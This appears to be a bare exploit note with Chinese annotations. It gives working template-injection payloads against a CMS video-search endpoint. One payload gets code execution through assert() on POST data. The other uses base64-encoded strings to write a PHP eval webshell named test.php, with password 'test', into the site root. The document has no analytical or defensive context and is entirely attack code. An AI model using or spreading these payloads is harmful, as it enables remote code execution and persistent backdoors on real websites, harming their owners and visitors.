getshell payload(a):
http://0-sec.org/index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}
POST a=phpinfo()
寫入網站根目錄一句話木馬文件payload(文件名:test.php,密碼:test):
http://0-sec.org/index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A}